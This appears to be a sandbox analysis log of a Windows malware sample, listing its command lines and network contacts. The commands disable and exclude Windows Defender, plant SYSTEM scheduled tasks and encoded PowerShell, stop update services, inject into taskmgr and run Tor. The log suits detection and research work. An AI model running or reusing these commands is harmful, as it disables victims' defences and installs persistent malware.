"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\AtBFliYUSCIU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KLjJYzCUqgUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\KcvIfpBEU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\OFVgegHnELnCC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\aFeOAQnlubilNTVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\VeitDxgWDfCRoOtN\" /t REG_DWORD /d 0 /reg:64;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\AtBFliYUSCIU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KLjJYzCUqgUn" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\KcvIfpBEU" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OFVgegHnELnCC" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\aFeOAQnlubilNTVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\VeitDxgWDfCRoOtN /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gkUCcFcjT" /SC once /ST 03:10:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gkUCcFcjT"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gkUCcFcjT"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "AtBWxWZQPczPtNlnn" /SC once /ST 15:25:38 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe\" nf /Zssite_idqtN 385118 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "AtBWxWZQPczPtNlnn"

C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe

C:\Windows\Temp\VeitDxgWDfCRoOtN\JREGxNGCKgjMZve\xcZvMbu.exe nf /Zssite_idqtN 385118 /S

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "bSTfouYtWkypYZNMeg"

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\KcvIfpBEU\DsPYJr.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "tPKRaMnTrSPPzpw" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "tPKRaMnTrSPPzpw2" /F /xml "C:\Program Files (x86)\KcvIfpBEU\YCgwUJq.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /END /TN "tPKRaMnTrSPPzpw"

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "tPKRaMnTrSPPzpw"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "adfRLMJfxNTLtT" /F /xml "C:\Program Files (x86)\AtBFliYUSCIU2\dROlsqs.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "KDnJrqmubUqQR2" /F /xml "C:\ProgramData\aFeOAQnlubilNTVB\SxVWXHC.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "QrnxlXQtqLuhZDTpp2" /F /xml "C:\Program Files (x86)\ImQtWXbHTHGSgfxRNpR\uytAyRN.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "frJpXGSvGdttwfSkGFg2" /F /xml "C:\Program Files (x86)\OFVgegHnELnCC\DdLstpe.xml" /RU "SYSTEM"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "GZVqxQnXgrdNzWCPM" /SC once /ST 06:51:16 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll\",#1 /aqsite_idmwH 385118" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "GZVqxQnXgrdNzWCPM"

C:\Windows\system32\rundll32.EXE

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll",#1 /aqsite_idmwH 385118

C:\Windows\SysWOW64\rundll32.exe

C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\VeitDxgWDfCRoOtN\LbEltzqf\GdYNwFS.dll",#1 /aqsite_idmwH 385118

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "GZVqxQnXgrdNzWCPM"

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\sc.exe

sc sdset WmiPrvSE D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\cmd.exe

cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\reg.exe

REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "AtBWxWZQPczPtNlnn"

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 2.136.104.51.in-addr.arpa udp
US 8.8.8.8:53 147.255.221.88.in-addr.arpa udp
US 8.8.8.8:53 69.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 yip.su udp
US 8.8.8.8:53 pastebin.com udp
US 188.114.97.0:443 yip.su tcp
US 104.20.67.143:443 pastebin.com tcp
US 8.8.8.8:53 julimichkids.online udp
